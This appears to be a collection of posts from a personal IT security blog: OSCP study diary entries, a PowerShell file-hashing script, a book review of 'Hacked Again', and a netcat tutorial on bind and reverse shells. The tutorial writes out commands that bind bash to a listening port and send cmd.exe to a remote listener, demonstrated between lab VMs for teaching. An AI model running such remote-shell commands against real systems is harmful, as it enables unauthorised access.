All posts by Thomas

My name is Thomas, Thanks for taking your time to visit my little corner of the internet! Hopefully you find my posts informative or interesting. I am a Computer Networking Honours Student and an IT Guy, I have created this blog as away for me to release my inner geekery and document my journey in the world of Networking

OSCP Diary Day 2 and 3

I’m now on day 3 of 90 of the OSCP. How has progress been!?…well, steady.

Time has been tight, with work, family etc. It’s hard to set aside blocks of time to really sit down and concentrate. I have the luxury of being able to do a bit at work (cause my work is awesome!), but much of that is broken up in between work stuff (Which obviously takes priority) so I haven’t had a huge amount of time to just sit down and focus on working though the course work.

But steady progress is better than no progress… and today…*druuum roooollllll* I popped my first box. Although it was very…VERY low hanging fruit.

I have also made some great progress in regards to enumeration. So all in all, the last couple of days while not being perfect have been okay.

I will need to take a day off tomorrow as I am attending a Cyber Security Conference (Which I am really pumped up for), but I will be back in action on Friday
I’ve still not had that “I can’t do this moment”…but I haven’t tried hard enough yet. Friday I hope to have a few hours of time to dedicate to this, so maybe that moment will come then!

Meaningful time in labs: 9 hours.

OSCP Diary Day 1

Welcome to my OSCP diary, somewhere for me to brain dump my thoughts as I work my way through the Penetration Testing with Kali Linux (PWK) course and then take the Offensive Security Certified Professional (OSCP) Exam.

The PWK/OSCP are under strict NDA so I will not be going into details here, I will be very general and very vague. So if you are looking for PWK tutorials and howtos, then you have come to the wrong place.

After weeks of waiting I finally got my OSCP lab access last night at 0000 Hours, as the bell tolled midnight the email that I had not patiently waited for was finally delivered.

The plan was wait up until midnight, get the email download all the stuff that I needed to get onto the labs, all the course materials etc. etc. then go to bed get a solid 7 hours sleep and be ready to spend Sunday pwning n00bs and popping shells!

So that was the plan, the reality however was somewhat more chaotic. Like a schoolboy at Christmas I have been getting a lot little hyped up over the last few days counting down the minutes to 0000 on my lab access day, thus I was already a little sleep deprived when I waited up to receive my email.

So the email comes in and I feel the rush of adrenalin surge though me (well about as much as a rush as you can get from receiving an email after a 20 hour day), and off I go dutifully downloading all the stuff I needed.

So I finished getting all the stuff and headed off to bed and sleep for a solid 7 hours….no I’m just kidding. I thought to myself, “ahh well I may as well configure everything just now so I’m ready to go in the morning.”, so off I go configuring all the things, getting everything just so.

It is now around 0100 everything is downloaded, everything is configured, all I need to do now is get some shut eye.

“But maybe I should just have a wee tincy wincy look at what I have in store for me”….so I open the course materials, pop on the forums, check out the IRC…it’s now 0200.

My mindset has now changed, I’m now thinking “well I’ve went this far I may as well get on the labs and have a look”…3 hours later it 0500 and I’ve just sat up all night, excited scanning all the things!
At this stage tiredness gets the better of me and I decide to call it a night (well technically morning).

So to bed I go 3 and bit hours later I’m awake again it is now 0830 and I am feeling compelled to get back in the labs. So to the labs I go…now it may be the sleep deprivation, it may be the excessive amount espressos I’ve consumed or it could be a combination of both, but I could not focus on any one thing. I must have wasted hours jumping around from one thing to another. I went from going rouge and jumping ahead of the game hitting random boxes to deciding to slow down and methodically just work my way though things from beginning to end.

In the end it now approaching 1800 I need to get things ready for the day job tomorrow (who I owe a big thank you to for putting me though the OSCP!), and I need to step away for a bit let everything from last 18 hours sink in.

The two take aways from day 1 are:

1: Sleep (it is a requirement unfortunately)
2: Plan ahead and prepare your day. (this will save a lot of time later on!)

Now roll on day 2 (of 90).

Meaningful time in labs: 6 Hours

Get MD5 and SHA1 digests in Windows 7

Hi my name is Thomas and I am a Linux user. But I am not a fanboy! Hard to believe I know, but to me an OS is just a big tool that allows me to use other tools, so if it is Linux, Windows or Macs I really don’t mind as long as it is up to the job I want it for.

I recently had to use a Windows 7 machine, so as usual I started by prepping it for what I wanted to use it for, one of my first tasks was installing a hypervisor so I could spin up some VM’s, Linux VM’s cause how am I expected to get anything done on Windows 7!!!1!??

Anyway as part of this download/install ritual, being a good security analyst I wanted to verify the integrity of what I was downloading by checking the hash digests. Upon investigation I realised that Windows 7 is not fit for purpose does not support this natively.

Looking into this further I found this blog post about the Get_FileHash CmdLet in Powershell, excellent I thought, this is just what I need.

Except…it wouldn’t work, I’m not sure why, I’m guessing it was only included in newer versions of PowerShell than the one I was using…all I know is that it would not work.

So off to PowerShell hacking and bodging I went! What I came up with was this ugly and in need of improvement but ultimately up to the job, script. (I just hope not clearing those variables during an running instance does not come back to haunt me!)

###############
# nettx.co.uk #
###############

#TODO: handel Errors
#TODO: Clear $vars after run


function Show-Menu
{
     
     param (
           [string]$Title = '
 _______          __ ___________       
 \      \   _____/  |\__    ___/__  ___
 /   |   \_/ __ \   __\|    |  \  \/  /
/    |    \  ___/|  |  |    |   >    < \____|__ /\___ >__|  |____|  /__/\_ \
        \/     \/                    \/ 
       Get hash digest tool
             thomas
                    '
     )
     
     cls
     Write-Host "$Title"
     Write-Host "Press '1' to get md5"
     Write-Host "Press '2' to get SHA1"
     Write-Host "press '3' to get both"
     Write-Host "Or double tap ENTER to exit..."
}
do
{
     Show-Menu
     $input = Read-Host "Please make a selection"
     switch ($input)
     {
           '1' {

$File = Read-Host "Enter the full path of the file to be hashed" 
$md5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
$hash_md5 = [System.BitConverter]::ToString($md5.ComputeHash([System.IO.File]::ReadAllBytes($File)))
$hash1_md5 = $hash_md5 -replace ‘[-]’,''
write-Host 
""
$hash1_md5
""
#$hash1_md5 = "TWAT"

Read-host "press any key to contine..."

                }'2'{
$hash1_sha1 = ""               
$File = Read-Host "Enter the full path of the file to be hashed" 
$sha1 = New-Object -TypeName System.Security.Cryptography.SHA1CryptoServiceProvider
$hash_sha1 = [System.BitConverter]::ToString($sha1.ComputeHash([System.IO.File]::ReadAllBytes($File)))
$hash1_sha1 = $hash_sha1 -replace ‘[-]’,''
write-Host
""
$hash1_sha1
""
Read-host "press any key to contine..."
                               
                }'3'{
                
$File = Read-Host "Enter the full path of the file to be hashed"               
$md5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
$hash_md5 = [System.BitConverter]::ToString($md5.ComputeHash([System.IO.File]::ReadAllBytes($File)))
$hash1_md5 = $hash_md5 -replace ‘[-]’,''


$sha1 = New-Object -TypeName System.Security.Cryptography.SHA1CryptoServiceProvider
$hash_sha1 = [System.BitConverter]::ToString($sha1.ComputeHash([System.IO.File]::ReadAllBytes($File)))
$hash1_sha1 = $hash_sha1 -replace ‘[-]’,''

Write-Host "
MD5:" $hash1_md5
Write-Host "
SHA1:" $hash1_sha1


Read-host "press any key to contine..."
               
                }'q'{
                return
                }
          }
}
until($input -eq '')

What are Bind and Reverse Shells?

I wanted to make a very short and simple post about shells…when starting out in pen testing you will hear a lot of chatter about shells, so this post hopes to clear up some of the terminology involved.

Now I guess that since you are reading this you’re already familiar with what a shell is. *If not have a look here* What I wanted to cover was bind shells and reverse shells…and what exactly the differences are. To do this we are going to run through a short exercise using the classic Netcat.

What you will need for this exercise are two machines on the same network segment, both with a copy of Netcat on them. They can be any combination of Linux or Windows (or something more exotic and/or $expensive = Macs).

For this exercise I spun up a couple of VMs, one Kali Linux box and one Windows Server 2012 box.

Netcat is included on Linux distros that come with Nmap as standard or can be downloaded from most standard Linux repos, for Windows you can pull the nc.exe from the web

Netcat is a simple (but powerful) command line tool that has become something of legend in the networking and security worlds, put simply Netcat can throw up listening TCP and UDP ports very quickly, it can unsurprisingly enough also connect to TCP and UDP ports just as easily.

Netcat comes into its own however with its power to read and write bits to and from these connections, this allows Netcat to perform a vast array of functions. For more have a look at the Netcat main page.

It is Netcat’s ability to read and write to layer 4 connections and streams that allows us to create the shells. This is done by redirecting the 3 shell I/O streams, stdin, stdout and stderr over the layer 4 connections.

The nuances of what is a bind shell and what is a reverse shell are dictated by the client server paradigm.

Okay, demo time, so either play along at home or just put your feet up and watch. *Read*

Our two boxes are Wendy the Windows box (192.168.1.80) and Lynn the Linux box (192.168.1.78).

So we will start with a bind shell, this is really quite simple, a bind shell is called a bind shell because it binds a shell to a listening TCP port. For example;

Lynn the Linux box wants to bind its bash shall to a listening port, the following command can be used to do this;

Lynn nc -nlvp nc 9874 -e /bin/bash

Let’s break that command down, nc is the Netcat binary, -nlvp: numeric (no dns names), listening, verbose and port, with 9874 as the option, this being the port that will be set to listen. The -e points to a file to be executed after the connection is established, in this instance that file is /bin/bash, our shell.

Now when a connection is established on Lynn (192.168.1.78:9874), the bash shell will fire up and proceed to redirect it’s I/O streams across the connection. So if we connect to it from another box we can access Lynn’s shell, lets do this from Wendy;

Wendy nc -nv 192.168.1.78 9874

And that’s it…it’s that simple, we now have control over an instance of bash running on Lynn from Wendy. From Wendy we can issue commands and see the output of them.

bind_shell

The reason this is known as a bind shell is because the shell is bound to the listening port, but what if we want to access Wendy’s Shell from Lynn while still maintaining the same Client/Server paradigm?

Well thankfully this is just as easy, what we are about to do is known as a reverse shell. First, as before we will set up a listening TCP port on Lynn, this time however we are not going to bind a shell to the listening port.

Lynn nc -nlvp nc 9874

Now on Wendy we are going to connect to Lynn’s listening port of 9874, this time however we are going to attach the Wendy’s cmd.exe shell to the client end of the conversation.

Wendy nc -nv 192.168.1.78 9874 -e cmd.exe

We now have access to Wendy’s shell on Lynn. There are a number of different reasons why we might choose between bind and reverse shells, the main one as far as pen testing goes is basic evasion, connections could be allowed in one direction but denied in the other, if Wendy and Lynn were on two separate network segments with a firewall in the middle for example, the firewall may allow outbound connections, but deny inbound connections.

In the example above Lynn acted as the server and Wendy as the client, but this paradigm can be reversed with the exact same results for both bind and reverse shells, simply setting Wendy to listen instead of Lynn

Answering the question, no one asked…

I have to be honest I do love myself a pocket reference guide. Even with the internet’s vast resources there is something about holding an old school, analogue, physical copy of a book that is pleasing in a way that searching the internet just isn’t.

The strange thing is that despite their name, I’ve never actually carried one of these books around in my pocket, this lead me to assume that they didn’t fit in real pockets….

Well as it turns out, predictably and obviously I was wrong….

Also…

Book Review: Hacked Again

Scott N. Schober’s Hacked Again has emblazoned across its cover ‘It can happen to anyone, even a cybersecurity expert.’ And so it begins, Scott is a cybersecurity expert and CEO of a hi-tech firm, in Hacked Again he takes us through his journey of being the victim of cyber crime, while along the way providing a plethora of expert and common sense advice on how to avoid finding yourself at the wrong end of cyber fraudsters.

Scott opens the book with an anecdote from his youth, opening his first bank account in a friendly local bank where people were on a first name basis, he describes the evolution of this bank and how through a series of mergers, acquisitions and takeovers it has become a modern day banking machine, impersonal and globalised. As the anecdote goes on Scott subtly drops little hints that will become relevant later.

This leads the reader seamlessly into how Scott first realised he had been hacked for the first time. One morning Scott noticed he had a number of suspicious transactions on his business account, after a little investigating it dawned on him…his account had been compromised. And so the motto on the cover proves true…‘It can happen to anyone, even a cybersecurity expert.’

As Scott looks into the compromise it begins to dawn on him, that perhaps it’s not a case of ‘it can happen to anyone even a cyber security expert’ and more a case of, ‘it can happen to anyone, especially a cybersecurity expert.’ While his business account was being investigated, Scott switched to his personal account, only to realise that was also being targeted. It was then Scott began to suspect he was being specifically targeted, that his bank credentials had been compromised and were being traded on the dark web by criminals who wanted to make an example out of the cyber security experts that make their life harder.

From here Scott describes yet another fraud his company was nearly the victim of. After receiving an order for high priced items to be sent by special delivery as soon as possible to an address in Indonesia, Scotts company dispatched the items, only to receive a call from an angry lawn mower repair company demanding to know why he had been charged for the aforementioned items that were currently winging their way to Southeast Asia.

Thanks to the timely phone call, Scott was able to put a halt to the order and recover the items. The lessons Scott learned? Well amongst other things, timely incident response is critical and if something seems to good to be true..it usually is.

Hacked Again then goes on to detail other cyber crimes involving identity theft, credit card fraud, social engineering as well as the tactics deployed by the attackers and the strategies to protect yourself from them. There are many themes that emerge as the book goes on such as who to trust, how to trust, defence in depth, password hygiene, internet browsing habits and the jarring reality of the divergence of feeling secure and actually being secure.

This book takes the reader on whirlwind tour of all manner of cyber crime, it covers malware from spyware to ransomware. Scott provides advice on how to avoid being compromised via spear phishing emails that have went from being very easy to spot with their broken English and low-res pictures to very convincing emails that look and feel the part. One of the golden nuggets buried in Hacked Again is that it not only tells you how to avoid being compromised but what to do if and when you are comprised.

The book continues to follow this blend of storytelling that is part anecdote, part ‘how to’ and part ‘how not to’. It moves swiftly and logically from one subject to the next. It is a book that does not linger on a subject long enough for it become boring or uninteresting. Instead the book flows and is a very easy to read, I was shocked when I first sat down to read Hacked Again only to realise two hours had passed in what seemed like the blink of an eye. Much of this is due to the graceful manner the author moves from one subject to the next.

The question I found myself asking when reading hacked again was ‘who is this aimed at?’, my conclusion was this is book is a must read for c-level management and medium to small business owners, as well as ICT Managers across the world. It gives an overview of the risks businesses face in today’s connected world, while providing tangible and relatable real world examples of these risks becoming real life problems.

But they are not the only people who should read this book, anyone with any kind of online presence could benefit from reading Hacked Again, that includes everyone from your grandparents to your computer science graduate buddies and yes even cyber security experts. Another group who will find this book of interest and perhaps not its obvious audience is anyone who fancies themselves as an expert in a particular field. In the latter stages of the book Scott discusses his experience as an media go to expert on cybersecuirty, this is one part of the book I found surprisingly insightful, if not entirely relevant

This books fits a niche, it is not a focused investigation into a specific topics like Brian Krebs Spam Nation, Misha Glenny’s Darkmarket or Kim Zettler’s Countdown to Zero Day, nor is it a technical tour de force like that found in a Bruce Schneier book. Hacked again just touches on those subjects, giving the reader awareness of them as examples of the darkness that is lurking out there. What this book is, is an exquisitely written warning, but not only a warning, it is a manual on what you can do to keep yourself and your business safe, and this is where its true value lies.

Hacked again is a veritable 101 the of risk of cybercrime and cyber security, an impeccable overview of the whos, the whats and the hows of information security, it gives this overview without ever slipping into hyperbolic hysteria in order to get its point across.

Scott’s manner of storytelling is seamless, he starts off on a thread and leads you down a path until its conclusion, all the while dropping bread crumbs of advice and the lessons he has learned along the way. It’s an effective blend of storytelling and educating, at no point do you ever feel condescended by the advice being dispensed. As a security researcher myself I know how easy it is to feel patronised when receiving security advice.

In the foreword for Hacked Again, radio host Jon Leiberman describes how Scott can translate complex technical details and tech talk into understandable information. This is true, Scott does know how to effectively demystify tech talk into non-intimidating, flowing and compelling storytelling. Hacked Again is the work of man who knows his subject and the work of man who has learned the lessons of what can happen when you are the victim of cybercrime, it is the work of man who wants to pass on those lessons to the reader and this is why it is a must read.

You can find Scott on Twitter @ScottBVS as well as following the Hacked Again Twitter account at @HackedAgainBook

About Scott Schober

Buy Hacked Again from Amazon UK

Buy Hacked Again from Amazon US

Get the audiobook from Audible UK

Get the audiobook from Audible US

Infamous IP Address Resurfaces

A couple of days ago researchers over at Sucuri posted a blog, detailing some investigative work on suspicious redirects which turned out to be the result of NameCheaps Free DNS service.

I won’t cover the detail of the blog (go read it, its a great piece of work) but one of the most surprising and interesting things (to me at least) uncovered was the resurrection of an IP related to the prehistoric and infamous conficker virus’s C2 domains.

So it just goes to show that I’m not the only person in security that like to pay homage to the past, even if I do it in a slightly less conspicuous fashion.

IPv4 Threat Intelligence – PowerShell Script

Following on from by previous post about gathering IPv4 threat intelligence automatically with Python scripts I thought I would follow it up with a PowerShell script I wrote that does something similar.

This script will work on Windows without the need for any extra installs, so it is perfect for users that only have access to Windows in the workplace.

It is often the case that security analysts and sys-admins need to grab bulk lists of IPv4 addresses from a data source, this data source can be logs, websites and intelligence feeds. Data sources such as these can contain lots of redundant data, such as domain names, time stamps etc. etc. In general removing this data can be done simply with a script and this is exactly what that script does.

I have seen a few scripts kicking about that do something similar to this, but they generally contain way more lines of code than is needed (although this does have some ASCII art of cats and dogs that really doesn’t need to be there) as well as requiring some kind of user input. This script is very tight with the code and the only user input required is dragging the input file over to the scripts directory.

This script allows you to take the data source in the form of a file and automatically convert it to a .csv of IPv4 addresses, fully de-deduped and with all redundant removed, ready to be used for whatever purpose you have in mind for it.

The Script is quite raw at the moment, so you will need to make a couple of edits to tailor it to your environment. See below for the bits that you may wish to edit:

  • Put the script in you documents folder as such $home\Documents\ipv4\
  • The file you want to run the script on will need to be dumped in the same folder
  • The ipv4_* wildcard is used to detect the input file
  • Follow this guide if you want to run the PowerShell script with a simple double click of a batch script

I have a script very similar to this that does the same thing, but grabs the input data from the web (similar to the python scripts, but in PowerShell), I will post this in the next few days.

Find the script here on GitHub